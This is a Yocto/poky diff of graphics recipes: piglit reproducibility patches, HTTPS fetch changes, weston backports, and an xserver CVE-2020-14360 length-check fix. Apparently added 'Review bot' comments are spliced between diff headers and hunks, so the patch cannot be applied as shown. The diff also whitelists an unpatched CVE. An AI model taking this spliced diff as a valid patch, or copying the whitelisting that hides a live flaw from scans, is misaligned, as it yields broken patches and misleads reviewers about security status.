+Date: Wed, 2 Dec 2020 21:21:52 +0000
+Subject: [PATCH] tests/shader.py: sort the file list before working on it
+
+This allows later xml output to be reproducible.
+
+Upstream-Status: Pending
+Signed-off-by: Alexander Kanavin <alex.kanavin@gmail.com>
+---
+ tests/shader.py | 4 +++-
+ 1 file changed, 3 insertions(+), 1 deletion(-)
+
+diff --git a/tests/shader.py b/tests/shader.py
+index 849273660..e6e65d1ba 100644
+--- a/tests/shader.py
++++ b/tests/shader.py
+@@ -52,7 +52,9 @@ for basedir in [TESTS_DIR, GENERATED_TESTS_DIR]:
+ for group, files in shader_tests.items():
+ assert group not in profile.test_list, 'duplicate group: {}'.format(group)
+
+- # We'll end up with a list of tuples, split that into two lists
++ # This makes the xml output reproducible, as os.walk() order is random
++ files.sort()
++ # We'll end up with a list of tuples, split that into two list
+ files, installedfiles = list(zip(*files))
+ files = list(files)
+ installedfiles = list(installedfiles)
diff --git a/poky/meta/recipes-graphics/piglit/piglit/0002-tests-util-piglit-shader.c-do-not-hardcode-build-pat.patch b/poky/meta/recipes-graphics/piglit/piglit/0002-tests-util-piglit-shader.c-do-not-hardcode-build-pat.patch
new file mode 100644
index 0000000000..16c7c5c803
--- /dev/null
+++ b/poky/meta/recipes-graphics/piglit/piglit/0002-tests-util-piglit-shader.c-do-not-hardcode-build-pat.patch
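Review bot: The comment above `files, installedfiles = list(zip(*files))` was rewritten to end in "two list"; the original "two lists" was correct, and leaving that line untouched would shrink the patch to two added lines. The new comment also calls `os.walk()` order random, while the sibling profile.py patch describes it as depending on where it is run; `# Sort so the xml output is reproducible: os.walk() order depends on the filesystem` says the same thing more precisely. The enclosing `for basedir` loop starts outside the hunk.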
@@ -0,0 +1,30 @@
+From 1c67250308a92d4991ed05d9d240090ab84accae Mon Sep 17 00:00:00 2001
+From: Alexander Kanavin <alex.kanavin@gmail.com>
+Date: Tue, 10 Nov 2020 17:13:50 +0000
+Subject: [PATCH 2/2] tests/util/piglit-shader.c: do not hardcode build path
+ into target binary
+
+This helps reproducibilty.
+
+Upstream-Status: Inappropriate [oe-core specific]
+Signed-off-by: Alexander Kanavin <alex.kanavin@gmail.com>
+---
+ tests/util/piglit-shader.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/tests/util/piglit-shader.c b/tests/util/piglit-shader.c
+index 4fd68d21e..c9ea8295e 100644
+--- a/tests/util/piglit-shader.c
++++ b/tests/util/piglit-shader.c
+@@ -73,7 +73,7 @@ piglit_compile_shader(GLenum target, const char *filename)
+
+ source_dir = getenv("PIGLIT_SOURCE_DIR");
+ if (source_dir == NULL) {
+- source_dir = SOURCE_DIR;
++ source_dir = ".";
+ }
+
+ snprintf(filename_with_path, FILENAME_MAX - 1,
+--
+2.17.1
+
diff --git a/poky/meta/recipes-graphics/piglit/piglit_git.bb b/poky/meta/recipes-graphics/piglit/piglit_git.bb
index 4229412554..9897ef1575 100644
--- a/poky/meta/recipes-graphics/piglit/piglit_git.bb
+++ b/poky/meta/recipes-graphics/piglit/piglit_git.bb
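Review bot: With `source_dir = ".";` the fallback in `piglit_compile_shader()` resolves shader files against whatever directory the test happens to be started from, so an unset `PIGLIT_SOURCE_DIR` now changes which files are opened without any diagnostic. A comment on that line would record the intent, `/* Build path must not be embedded in the binary; callers are expected to set PIGLIT_SOURCE_DIR */`, and the place that launches the tests on target should set the variable explicitly rather than rely on the working directory. The function body continues outside the hunk, so whether a later open failure reports the resolved path cannot be seen from here.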
@@ -6,13 +6,19 @@ BUGTRACKER = "https://gitlab.freedesktop.org/mesa/piglit/-/issues" LICENSE = "MIT & LGPLv2+ & GPLv3 & GPLv2+ & BSD-3-Clause" LIC_FILES_CHKSUM = "file://COPYING;md5=b2beded7103a3d8a442a2a0391d607b0" -SRC_URI = "git://gitlab.freedesktop.org/mesa/piglit.git;protocol=https \ +SRC_URI = "git://gitlab.freedesktop.org/mesa/piglit.git;protocol=https;branch=main \ file://0001-cmake-install-bash-completions-in-the-right-place.patch \ file://0001-cmake-use-proper-WAYLAND_INCLUDE_DIRS-variable.patch \ + file://0001-Add-a-missing-include-for-htobe32-definition.patch \ + file://0001-generated_tests-gen_tcs-tes_input_tests.py-do-not-ha.patch \ + file://0002-tests-util-piglit-shader.c-do-not-hardcode-build-pat.patch \ + file://0001-serializer.py-make-.gz-files-reproducible.patch \ + file://0001-framework-profile.py-make-test-lists-reproducible.patch \ + file://0001-tests-shader.py-sort-the-file-list-before-working-on.patch \ " UPSTREAM_CHECK_COMMITS = "1" -SRCREV = "6126c2d4e476c7770d216ffa1932c10e2a5a7813" +SRCREV = "83bc56abf2686e2cd9024a152e121ca4aa524985" # (when PV goes above 1.0 remove the trailing r) PV = "1.0+gitr${SRCPV}" @@ -37,7 +43,9 @@ do_compile[dirs] =+ "${B}/temp/" PACKAGECONFIG ??= "${@bb.utils.filter('DISTRO_FEATURES', 'x11', d)}" PACKAGECONFIG[freeglut] = "-DPIGLIT_USE_GLUT=1,-DPIGLIT_USE_GLUT=0,freeglut," PACKAGECONFIG[x11] = "-DPIGLIT_BUILD_GL_TESTS=ON,-DPIGLIT_BUILD_GL_TESTS=OFF,${X11_DEPS}, ${X11_RDEPS}" +PACKAGECONFIG[vulkan] = "-DPIGLIT_BUILD_VK_TESTS=ON,-DPIGLIT_BUILD_VK_TESTS=OFF,vulkan-loader" +export PIGLIT_BUILD_DIR = "../../../../git" do_configure_prepend() { if [ "${@bb.utils.contains('PACKAGECONFIG', 'freeglut', 'yes', 'no', d)}" = "no" ]; then diff --git a/poky/meta/recipes-graphics/virglrenderer/virglrenderer_0.8.2.bb b/poky/meta/recipes-graphics/virglrenderer/virglrenderer_0.8.2.bb index 1046b8504f..772db5bbaf 100644 --- a/poky/meta/recipes-graphics/virglrenderer/virglrenderer_0.8.2.bb 
+++ b/poky/meta/recipes-graphics/virglrenderer/virglrenderer_0.8.2.bb @@ -10,7 +10,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=c81c08eeefd9418fca8f88309a76db10" DEPENDS = "libdrm mesa libepoxy" SRCREV = "7d204f3927be65fb3365dce01dbcd04d447a4985" -SRC_URI = "git://anongit.freedesktop.org/virglrenderer \ +SRC_URI = "git://anongit.freedesktop.org/virglrenderer;branch=master \ file://0001-gallium-Expand-libc-check-to-be-platform-OS-check.patch \ file://0001-meson.build-use-python3-directly-for-python.patch \ " diff --git a/poky/meta/recipes-graphics/vulkan/assimp_5.0.1.bb b/poky/meta/recipes-graphics/vulkan/assimp_5.0.1.bb index 5a8c62e64d..295ac12fc5 100644 --- a/poky/meta/recipes-graphics/vulkan/assimp_5.0.1.bb +++ b/poky/meta/recipes-graphics/vulkan/assimp_5.0.1.bb @@ -8,7 +8,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=2119edef0916b0bd511cb3c731076271" DEPENDS = "zlib" -SRC_URI = "git://github.com/assimp/assimp.git;branch=assimp_5.0_release \ +SRC_URI = "git://github.com/assimp/assimp.git;branch=assimp_5.0_release;protocol=https \ file://0001-closes-https-github.com-assimp-assimp-issues-2733-up.patch \ file://0001-Use-ASSIMP_LIB_INSTALL_DIR-to-search-library.patch \ " diff --git a/poky/meta/recipes-graphics/vulkan/vulkan-demos_git.bb b/poky/meta/recipes-graphics/vulkan/vulkan-demos_git.bb index c94e768b52..b212814759 100644 --- a/poky/meta/recipes-graphics/vulkan/vulkan-demos_git.bb +++ b/poky/meta/recipes-graphics/vulkan/vulkan-demos_git.bb 
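Review bot: The new `SRC_URI` for virglrenderer gains `;branch=master` but, unlike the github.com recipes touched in this update, no `;protocol=https`, so the fetch presumably stays on the unauthenticated `git://` transport; the xf86-video-intel hunk later in this diff has the same shape. The `SRCREV` pin limits what a tampered transfer could deliver, but an authenticated transport is the stronger control. If the host serves this repository over HTTPS, append `;protocol=https` (adjusting the path if the HTTPS URL differs) in both recipes.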
@@ -8,9 +8,9 @@ LIC_FILES_CHKSUM = "file://LICENSE.md;md5=dcf473723faabf17baa9b5f2207599d0 \ SRCREV_glm = "1ad55c5016339b83b7eec98c31007e0aee57d2bf" SRCREV_gli = "7da5f50931225e9819a26d5cb323c5f42da50bcd" -SRC_URI = "git://github.com/SaschaWillems/Vulkan.git \ - git://github.com/g-truc/glm;destsuffix=git/external/glm;name=glm \ - git://github.com/g-truc/gli;destsuffix=git/external/gli;name=gli \ +SRC_URI = "git://github.com/SaschaWillems/Vulkan.git;branch=master;protocol=https \ + git://github.com/g-truc/glm;destsuffix=git/external/glm;name=glm;branch=master;protocol=https \ + git://github.com/g-truc/gli;destsuffix=git/external/gli;name=gli;branch=master;protocol=https \ file://0001-Don-t-build-demos-with-questionably-licensed-data.patch \ " UPSTREAM_CHECK_COMMITS = "1" diff --git a/poky/meta/recipes-graphics/vulkan/vulkan-headers_1.1.126.0.bb b/poky/meta/recipes-graphics/vulkan/vulkan-headers_1.1.126.0.bb index b9658d3afa..c58a801e03 100644 --- a/poky/meta/recipes-graphics/vulkan/vulkan-headers_1.1.126.0.bb +++ b/poky/meta/recipes-graphics/vulkan/vulkan-headers_1.1.126.0.bb @@ -9,7 +9,7 @@ SECTION = "libs" LICENSE = "Apache-2.0" LIC_FILES_CHKSUM = "file://LICENSE.txt;md5=3b83ef96387f14655fc854ddc3c6bd57" -SRC_URI = "git://github.com/KhronosGroup/Vulkan-Headers.git;branch=sdk-1.1.126" +SRC_URI = "git://github.com/KhronosGroup/Vulkan-Headers.git;branch=sdk-1.1.126;protocol=https" SRCREV = "5bc459e2921304c32568b73edaac8d6df5f98b84" diff --git a/poky/meta/recipes-graphics/vulkan/vulkan-loader_1.1.126.0.bb b/poky/meta/recipes-graphics/vulkan/vulkan-loader_1.1.126.0.bb index 504cf85a2b..c8352bf31d 100644 --- a/poky/meta/recipes-graphics/vulkan/vulkan-loader_1.1.126.0.bb +++ b/poky/meta/recipes-graphics/vulkan/vulkan-loader_1.1.126.0.bb 
@@ -9,7 +9,7 @@ SECTION = "libs" LICENSE = "Apache-2.0" LIC_FILES_CHKSUM = "file://LICENSE.txt;md5=7dbefed23242760aa3475ee42801c5ac" -SRC_URI = "git://github.com/KhronosGroup/Vulkan-Loader.git;branch=sdk-1.1.126" +SRC_URI = "git://github.com/KhronosGroup/Vulkan-Loader.git;branch=sdk-1.1.126;protocol=https" SRCREV = "4adad4ff705fa76f9edb2d37cb57e593decb60ed" S = "${WORKDIR}/git" diff --git a/poky/meta/recipes-graphics/vulkan/vulkan-tools_1.1.126.0.bb b/poky/meta/recipes-graphics/vulkan/vulkan-tools_1.1.126.0.bb index 8eef1bca73..ec65f11952 100644 --- a/poky/meta/recipes-graphics/vulkan/vulkan-tools_1.1.126.0.bb +++ b/poky/meta/recipes-graphics/vulkan/vulkan-tools_1.1.126.0.bb @@ -6,7 +6,7 @@ SECTION = "libs" LICENSE = "Apache-2.0" LIC_FILES_CHKSUM = "file://LICENSE.txt;md5=3b83ef96387f14655fc854ddc3c6bd57" -SRC_URI = "git://github.com/KhronosGroup/Vulkan-Tools.git;branch=sdk-1.1.126" +SRC_URI = "git://github.com/KhronosGroup/Vulkan-Tools.git;branch=sdk-1.1.126;protocol=https" SRCREV = "09695dfc5dbe54f869aeaff8db93bb7bb6a220e0" S = "${WORKDIR}/git" diff --git a/poky/meta/recipes-graphics/waffle/waffle_1.6.0.bb b/poky/meta/recipes-graphics/waffle/waffle_1.6.0.bb index 14d6a61525..f0dc780ca1 100644 --- a/poky/meta/recipes-graphics/waffle/waffle_1.6.0.bb +++ b/poky/meta/recipes-graphics/waffle/waffle_1.6.0.bb 
@@ -3,17 +3,19 @@ DESCRIPTION = "A cross-platform C library that allows one to defer selection \ of an OpenGL API and window system until runtime. For example, on Linux, Waffle \ enables an application to select X11/EGL with an OpenGL 3.3 core profile, \ Wayland with OpenGL ES2, and other window system / API combinations." -HOMEPAGE = "http://www.waffle-gl.org/" +HOMEPAGE = "https://gitlab.freedesktop.org/mesa/waffle" BUGTRACKER = "https://gitlab.freedesktop.org/mesa/waffle" LICENSE = "BSD-2-Clause" LIC_FILES_CHKSUM = "file://LICENSE.txt;md5=4c5154407c2490750dd461c50ad94797 \ file://include/waffle/waffle.h;endline=24;md5=61dbf8697f61c78645e75a93c585b1bf" -SRC_URI = "http://waffle-gl.org/files/release/${BPN}-${PV}/${BPN}-${PV}.tar.xz" -SRC_URI[md5sum] = "61bfc1a478e840825f33ddb4057115e7" -SRC_URI[sha256sum] = "d9c899f710c50cfdd00f5f4cdfeaef0687d8497362239bdde93bed6c909c81d7" +SRC_URI = "https://gitlab.freedesktop.org/mesa/waffle/-/archive/v${PV}/${BPN}-v${PV}.tar.bz2" +SRC_URI[md5sum] = "9eaef03c8220dc8d64e2e42ae1b8c942" +SRC_URI[sha256sum] = "38ef38fefbda605ba905ce00435a63fe45e9bf17a5eff096c3a47b5006a619cb" -UPSTREAM_CHECK_URI = "http://www.waffle-gl.org/releases.html" +S = "${WORKDIR}/${BPN}-v${PV}" + +UPSTREAM_CHECK_URI = "https://gitlab.freedesktop.org/mesa/waffle/-/releases" inherit meson features_check lib_package bash-completion diff --git a/poky/meta/recipes-graphics/wayland/weston/0002-desktop-shell-Remove-no-op-de-activation-of-the-xdg-.patch b/poky/meta/recipes-graphics/wayland/weston/0002-desktop-shell-Remove-no-op-de-activation-of-the-xdg-.patch new file mode 100644 index 0000000000..fb36d3817a --- /dev/null +++ b/poky/meta/recipes-graphics/wayland/weston/0002-desktop-shell-Remove-no-op-de-activation-of-the-xdg-.patch 
@@ -0,0 +1,32 @@ +From 5c74a0640e873694bf60a88eceb21f664cb4b8f7 Mon Sep 17 00:00:00 2001 +From: Marius Vlad <marius.vlad@collabora.com> +Date: Fri, 5 Mar 2021 20:03:49 +0200 +Subject: [PATCH 2/5] desktop-shell: Remove no-op de-activation of the xdg + top-level surface + +The shsurf is calloc'ed so the surface count is always 0. Not only +that but the surface is not set as active by default, so there's no +need to de-activate it. + +Upstream-Status: Backport [05bef4c18a3e82376a46a4a28d978389c4c0fd0f] +Signed-off-by: Marius Vlad <marius.vlad@collabora.com> +--- + desktop-shell/shell.c | 2 -- + 1 file changed, 2 deletions(-) + +diff --git a/desktop-shell/shell.c b/desktop-shell/shell.c +index 442a625f..3791be25 100644 +--- a/desktop-shell/shell.c ++++ b/desktop-shell/shell.c +@@ -2427,8 +2427,6 @@ desktop_surface_added(struct weston_desktop_surface *desktop_surface, + wl_list_init(&shsurf->children_link); + + weston_desktop_surface_set_user_data(desktop_surface, shsurf); +- weston_desktop_surface_set_activated(desktop_surface, +- shsurf->focus_count > 0); + } + + static void +-- +2.34.1 + diff --git a/poky/meta/recipes-graphics/wayland/weston/0003-desktop-shell-Rename-gain-lose-keyboard-focus-to-act.patch b/poky/meta/recipes-graphics/wayland/weston/0003-desktop-shell-Rename-gain-lose-keyboard-focus-to-act.patch new file mode 100644 index 0000000000..dcd0700fca --- /dev/null +++ b/poky/meta/recipes-graphics/wayland/weston/0003-desktop-shell-Rename-gain-lose-keyboard-focus-to-act.patch 
@@ -0,0 +1,57 @@ +From edb31c456ae3da7ffffefb668a37ab88075c4b67 Mon Sep 17 00:00:00 2001 +From: Marius Vlad <marius.vlad@collabora.com> +Date: Fri, 5 Mar 2021 21:40:22 +0200 +Subject: [PATCH 3/5] desktop-shell: Rename gain/lose keyboard focus to + activate/de-activate + +This way it better reflects that it handles activation rather that input +focus. + +Upstream-Status: Backport [ab39e1d76d4f6715cb300bc37f5c2a0e2d426208] +Signed-off-by: Marius Vlad <marius.vlad@collabora.com> +--- + desktop-shell/shell.c | 8 ++++---- + 1 file changed, 4 insertions(+), 4 deletions(-) + +diff --git a/desktop-shell/shell.c b/desktop-shell/shell.c +index 3791be25..c4669f11 100644 +--- a/desktop-shell/shell.c ++++ b/desktop-shell/shell.c +@@ -1869,14 +1869,14 @@ handle_pointer_focus(struct wl_listener *listener, void *data) + } + + static void +-shell_surface_lose_keyboard_focus(struct shell_surface *shsurf) ++shell_surface_deactivate(struct shell_surface *shsurf) + { + if (--shsurf->focus_count == 0) + weston_desktop_surface_set_activated(shsurf->desktop_surface, false); + } + + static void +-shell_surface_gain_keyboard_focus(struct shell_surface *shsurf) ++shell_surface_activate(struct shell_surface *shsurf) + { + if (shsurf->focus_count++ == 0) + weston_desktop_surface_set_activated(shsurf->desktop_surface, true); +@@ -1891,7 +1891,7 @@ handle_keyboard_focus(struct wl_listener *listener, void *data) + if (seat->focused_surface) { + struct shell_surface *shsurf = get_shell_surface(seat->focused_surface); + if (shsurf) +- shell_surface_lose_keyboard_focus(shsurf); ++ shell_surface_deactivate(shsurf); + } + + seat->focused_surface = weston_surface_get_main_surface(keyboard->focus); +@@ -1899,7 +1899,7 @@ handle_keyboard_focus(struct wl_listener *listener, void *data) + if (seat->focused_surface) { + struct shell_surface *shsurf = get_shell_surface(seat->focused_surface); + if (shsurf) +- shell_surface_gain_keyboard_focus(shsurf); ++ shell_surface_activate(shsurf); + } + } + +-- +2.34.1 
+ diff --git a/poky/meta/recipes-graphics/wayland/weston/0004-desktop-shell-Embed-keyboard-focus-handle-code-when-.patch b/poky/meta/recipes-graphics/wayland/weston/0004-desktop-shell-Embed-keyboard-focus-handle-code-when-.patch new file mode 100644 index 0000000000..7ca72f8494 --- /dev/null +++ b/poky/meta/recipes-graphics/wayland/weston/0004-desktop-shell-Embed-keyboard-focus-handle-code-when-.patch 
@@ -0,0 +1,99 @@ +From 899ad5a6a8a92f2c10e0694a45c982b7d878aed6 Mon Sep 17 00:00:00 2001 +From: Marius Vlad <marius.vlad@collabora.com> +Date: Fri, 5 Mar 2021 21:44:26 +0200 +Subject: [PATCH 4/5] desktop-shell: Embed keyboard focus handle code when + activating + +We shouldn't be constrained by having a keyboard plugged-in, so avoid +activating/de-activating the window/surface in the keyboard focus +handler and embed it straight into the window activation part. + +Upstream-Status: Backport [f12697bb3e4c6eb85437ed905e7de44ae2a0ba69] +Signed-off-by: Marius Vlad <marius.vlad@collabora.com> +--- + desktop-shell/shell.c | 41 +++++++++++++++++++++++++---------------- + 1 file changed, 25 insertions(+), 16 deletions(-) + +diff --git a/desktop-shell/shell.c b/desktop-shell/shell.c +index c4669f11..c6a4fe91 100644 +--- a/desktop-shell/shell.c ++++ b/desktop-shell/shell.c +@@ -1885,22 +1885,7 @@ shell_surface_activate(struct shell_surface *shsurf) + static void + handle_keyboard_focus(struct wl_listener *listener, void *data) + { +- struct weston_keyboard *keyboard = data; +- struct shell_seat *seat = get_shell_seat(keyboard->seat); +- +- if (seat->focused_surface) { +- struct shell_surface *shsurf = get_shell_surface(seat->focused_surface); +- if (shsurf) +- shell_surface_deactivate(shsurf); +- } +- +- seat->focused_surface = weston_surface_get_main_surface(keyboard->focus); +- +- if (seat->focused_surface) { +- struct shell_surface *shsurf = get_shell_surface(seat->focused_surface); +- if (shsurf) +- shell_surface_activate(shsurf); +- } ++ /* FIXME: To be removed later. 
*/ + } + + /* The surface will be inserted into the list immediately after the link +@@ -2438,6 +2423,7 @@ desktop_surface_removed(struct weston_desktop_surface *desktop_surface, + struct shell_surface *shsurf_child, *tmp; + struct weston_surface *surface = + weston_desktop_surface_get_surface(desktop_surface); ++ struct weston_seat *seat; + + if (!shsurf) + return; +@@ -2448,6 +2434,18 @@ desktop_surface_removed(struct weston_desktop_surface *desktop_surface, + } + wl_list_remove(&shsurf->children_link); + ++ wl_list_for_each(seat, &shsurf->shell->compositor->seat_list, link) { ++ struct shell_seat *shseat = get_shell_seat(seat); ++ /* activate() controls the focused surface activation and ++ * removal of a surface requires invalidating the ++ * focused_surface to avoid activate() use a stale (and just ++ * removed) surface when attempting to de-activate it. It will ++ * also update the focused_surface once it has a chance to run. ++ */ ++ if (surface == shseat->focused_surface) ++ shseat->focused_surface = NULL; ++ } ++ + wl_signal_emit(&shsurf->destroy_signal, shsurf); + + if (shsurf->fullscreen.black_view) +@@ -3836,6 +3834,7 @@ activate(struct desktop_shell *shell, struct weston_view *view, + struct workspace *ws; + struct weston_surface *old_es; + struct shell_surface *shsurf, *shsurf_child; ++ struct shell_seat *shseat = get_shell_seat(seat); + + main_surface = weston_surface_get_main_surface(es); + shsurf = get_shell_surface(main_surface); +@@ -3855,6 +3854,16 @@ activate(struct desktop_shell *shell, struct weston_view *view, + + weston_view_activate(view, seat, flags); + ++ if (shseat->focused_surface) { ++ struct shell_surface *current_focus = ++ get_shell_surface(shseat->focused_surface); ++ assert(current_focus); ++ shell_surface_deactivate(current_focus); ++ } ++ ++ shseat->focused_surface = main_surface; ++ shell_surface_activate(shsurf); ++ + state = ensure_focus_state(shell, seat); + if (state == NULL) + return; +-- +2.34.1 + 
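Review bot: In the lines added to `activate()`, `assert(current_focus);` replaces the `if (shsurf)` guard that the removed body of `handle_keyboard_focus()` placed around the same de-activation call. If `get_shell_surface()` can return NULL for `shseat->focused_surface`, a debug build now aborts the compositor and a build with assertions disabled passes NULL on to `shell_surface_deactivate()`; `if (current_focus) shell_surface_deactivate(current_focus);` keeps the earlier tolerant behaviour. The patch is marked as a backport, so the change would need to go upstream first. `activate()` starts and ends outside the hunk, so any earlier NULL check on `shsurf` is not visible here.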
diff --git a/poky/meta/recipes-graphics/wayland/weston_8.0.0.bb b/poky/meta/recipes-graphics/wayland/weston_8.0.0.bb index 0b383f25f3..5e4e2032c9 100644 --- a/poky/meta/recipes-graphics/wayland/weston_8.0.0.bb +++ b/poky/meta/recipes-graphics/wayland/weston_8.0.0.bb @@ -10,6 +10,9 @@ SRC_URI = "https://wayland.freedesktop.org/releases/${BPN}-${PV}.tar.xz \ file://weston.desktop \ file://xwayland.weston-start \ file://0001-weston-launch-Provide-a-default-version-that-doesn-t.patch \ + file://0002-desktop-shell-Remove-no-op-de-activation-of-the-xdg-.patch \ + file://0003-desktop-shell-Rename-gain-lose-keyboard-focus-to-act.patch \ + file://0004-desktop-shell-Embed-keyboard-focus-handle-code-when-.patch \ " SRC_URI[md5sum] = "53e4810d852df0601d01fd986a5b22b3" SRC_URI[sha256sum] = "7518b49b2eaa1c3091f24671bdcc124fd49fc8f1af51161927afa4329c027848" diff --git a/poky/meta/recipes-graphics/xinput-calibrator/xinput-calibrator_git.bb b/poky/meta/recipes-graphics/xinput-calibrator/xinput-calibrator_git.bb index d2a16643fe..e524b82dd6 100644 --- a/poky/meta/recipes-graphics/xinput-calibrator/xinput-calibrator_git.bb +++ b/poky/meta/recipes-graphics/xinput-calibrator/xinput-calibrator_git.bb @@ -12,7 +12,7 @@ inherit autotools pkgconfig features_check REQUIRED_DISTRO_FEATURES = "x11" SRCREV = "18ec53f1cada39f905614ebfaffed5c7754ecf46" -SRC_URI = "git://github.com/kreijack/xinput_calibrator.git;branch=libinput \ +SRC_URI = "git://github.com/kreijack/xinput_calibrator.git;branch=libinput;protocol=https \ file://30xinput_calibrate.sh \ file://Allow-xinput_calibrator_pointercal.sh-to-be-run-as-n.patch \ file://0001-calibrator.hh-Include-string-to-get-std-string.patch \ diff --git a/poky/meta/recipes-graphics/xorg-driver/xf86-video-intel_git.bb b/poky/meta/recipes-graphics/xorg-driver/xf86-video-intel_git.bb index 553840ddb8..685362ef15 100644 --- a/poky/meta/recipes-graphics/xorg-driver/xf86-video-intel_git.bb +++ b/poky/meta/recipes-graphics/xorg-driver/xf86-video-intel_git.bb 
@@ -13,7 +13,7 @@ SRCREV = "f66d39544bb8339130c96d282a80f87ca1606caf" PV = "2.99.917+git${SRCPV}" S = "${WORKDIR}/git" -SRC_URI = "git://anongit.freedesktop.org/xorg/driver/xf86-video-intel" +SRC_URI = "git://anongit.freedesktop.org/xorg/driver/xf86-video-intel;branch=master" UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>\d+(\.\d+)+)" diff --git a/poky/meta/recipes-graphics/xorg-xserver/xserver-xorg.inc b/poky/meta/recipes-graphics/xorg-xserver/xserver-xorg.inc index b4f0760176..c891211c40 100644 --- a/poky/meta/recipes-graphics/xorg-xserver/xserver-xorg.inc +++ b/poky/meta/recipes-graphics/xorg-xserver/xserver-xorg.inc @@ -18,7 +18,15 @@ INC_PR = "r8" XORG_PN = "xorg-server" SRC_URI = "${XORG_MIRROR}/individual/xserver/${XORG_PN}-${PV}.tar.bz2" -CVE_PRODUCT = "xorg-server" +CVE_PRODUCT = "xorg-server x_server" +# This is specific to Debian's xserver-wrapper.c +CVE_CHECK_WHITELIST += "CVE-2011-4613" +# As per upstream, exploiting this flaw is non-trivial and it requires exact +# timing on the behalf of the attacker. Many graphical applications exit if their +# connection to the X server is lost, so a typical desktop session is either +# impossible or difficult to exploit. There is currently no upstream patch +# available for this flaw. +CVE_CHECK_WHITELIST += "CVE-2020-25697" S = "${WORKDIR}/${XORG_PN}-${PV}" diff --git a/poky/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-14360.patch b/poky/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-14360.patch new file mode 100644 index 0000000000..e9ab42742e --- /dev/null +++ b/poky/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2020-14360.patch 
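Review bot: Adding `CVE-2020-25697` to `CVE_CHECK_WHITELIST` in xserver-xorg.inc removes it from cve-check output although the accompanying comment states that no upstream patch exists, so the recipe will report clean while the flaw is still present. The two entries are different cases: `CVE-2011-4613` is described as not applicable, `CVE-2020-25697` is an accepted risk, and the comment should say so, for example `# Accepted risk, unfixed upstream: re-evaluate on every xserver upgrade`. That keeps the entry from being carried forward unexamined once a fix becomes available.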
@@ -0,0 +1,132 @@ +From 446ff2d3177087b8173fa779fa5b77a2a128988b Mon Sep 17 00:00:00 2001 +From: Matthieu Herrb <matthieu@herrb.eu> +Date: Thu, 12 Nov 2020 19:15:07 +0100 +Subject: [PATCH] Check SetMap request length carefully. + +Avoid out of bounds memory accesses on too short request. + +ZDI-CAN 11572 / CVE-2020-14360 + +This vulnerability was discovered by: +Jan-Niklas Sohn working with Trend Micro Zero Day Initiative + +Signed-off-by: Matthieu Herrb <matthieu@herrb.eu> + +Upstream-Status: Backport +https://gitlab.freedesktop.org/xorg/xserver/-/commit/446ff2d3177087b8173fa779fa5b77a2a128988b +CVE: CVE-2020-14360 +Signed-off-by: Armin Kuster <akuster@mvista.com> +--- + xkb/xkb.c | 92 +++++++++++++++++++++++++++++++++++++++++++++++++++++++ + 1 file changed, 92 insertions(+) + +Index: xorg-server-1.20.8/xkb/xkb.c +=================================================================== +--- xorg-server-1.20.8.orig/xkb/xkb.c ++++ xorg-server-1.20.8/xkb/xkb.c +@@ -2382,6 +2382,93 @@ SetVirtualModMap(XkbSrvInfoPtr xkbi, + return (char *) wire; + } + ++#define _add_check_len(new) \ ++ if (len > UINT32_MAX - (new) || len > req_len - (new)) goto bad; \ ++ else len += new ++ ++/** ++ * Check the length of the SetMap request ++ */ ++static int ++_XkbSetMapCheckLength(xkbSetMapReq *req) ++{ ++ size_t len = sz_xkbSetMapReq, req_len = req->length << 2; ++ xkbKeyTypeWireDesc *keytype; ++ xkbSymMapWireDesc *symmap; ++ BOOL preserve; ++ int i, map_count, nSyms; ++ ++ if (req_len < len) ++ goto bad; ++ /* types */ ++ if (req->present & XkbKeyTypesMask) { ++ keytype = (xkbKeyTypeWireDesc *)(req + 1); ++ for (i = 0; i < req->nTypes; i++) { ++ _add_check_len(XkbPaddedSize(sz_xkbKeyTypeWireDesc)); ++ if (req->flags & XkbSetMapResizeTypes) { ++ _add_check_len(keytype->nMapEntries ++ * sz_xkbKTSetMapEntryWireDesc); ++ preserve = keytype->preserve; ++ map_count = keytype->nMapEntries; ++ if (preserve) { ++ _add_check_len(map_count * sz_xkbModsWireDesc); ++ } ++ keytype += 1; ++ keytype = 
(xkbKeyTypeWireDesc *) ++ ((xkbKTSetMapEntryWireDesc *)keytype + map_count); ++ if (preserve) ++ keytype = (xkbKeyTypeWireDesc *) ++ ((xkbModsWireDesc *)keytype + map_count); ++ } ++ } ++ } ++ /* syms */ ++ if (req->present & XkbKeySymsMask) { ++ symmap = (xkbSymMapWireDesc *)((char *)req + len); ++ for (i = 0; i < req->nKeySyms; i++) { ++ _add_check_len(sz_xkbSymMapWireDesc); ++ nSyms = symmap->nSyms; ++ _add_check_len(nSyms*sizeof(CARD32)); ++ symmap += 1; ++ symmap = (xkbSymMapWireDesc *)((CARD32 *)symmap + nSyms); ++ } ++ } ++ /* actions */ ++ if (req->present & XkbKeyActionsMask) { ++ _add_check_len(req->totalActs * sz_xkbActionWireDesc ++ + XkbPaddedSize(req->nKeyActs)); ++ } ++ /* behaviours */ ++ if (req->present & XkbKeyBehaviorsMask) { ++ _add_check_len(req->totalKeyBehaviors * sz_xkbBehaviorWireDesc); ++ } ++ /* vmods */ ++ if (req->present & XkbVirtualModsMask) { ++ _add_check_len(XkbPaddedSize(Ones(req->virtualMods))); ++ } ++ /* explicit */ ++ if (req->present & XkbExplicitComponentsMask) { ++ /* two bytes per non-zero explicit componen */ ++ _add_check_len(XkbPaddedSize(req->totalKeyExplicit * sizeof(CARD16))); ++ } ++ /* modmap */ ++ if (req->present & XkbModifierMapMask) { ++ /* two bytes per non-zero modmap component */ ++ _add_check_len(XkbPaddedSize(req->totalModMapKeys * sizeof(CARD16))); ++ } ++ /* vmodmap */ ++ if (req->present & XkbVirtualModMapMask) { ++ _add_check_len(req->totalVModMapKeys * sz_xkbVModMapWireDesc); ++ } ++ if (len == req_len) ++ return Success; ++bad: ++ ErrorF("[xkb] BOGUS LENGTH in SetMap: expected %ld got %ld\n", ++ len, req_len); ++ return BadLength; ++} ++ ++ + /** + * Check if the given request can be applied to the given device but don't + * actually do anything.. 
